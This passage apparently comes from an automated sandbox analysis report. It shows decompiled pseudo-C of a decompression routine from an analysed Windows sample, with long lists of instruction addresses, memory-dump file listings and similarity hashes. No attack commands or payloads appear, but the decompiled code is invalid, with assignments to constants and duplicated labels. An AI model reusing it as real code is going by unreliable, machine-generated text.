															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













              0x00000000
              0x00407018
              0x00407018
              0x0040701c
              0x00407029
              0x00407033
              0x00000000
              0x0040701e
              0x0040701e
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x004072c7
              0x004072ca
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00407318
              0x0040731c
              0x004074cb
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x004074fd
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x004072c7
              0x004072c7
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7
              0x00000000
              0x0040701c

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
              • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
              • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
              • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406F64, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406F64() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
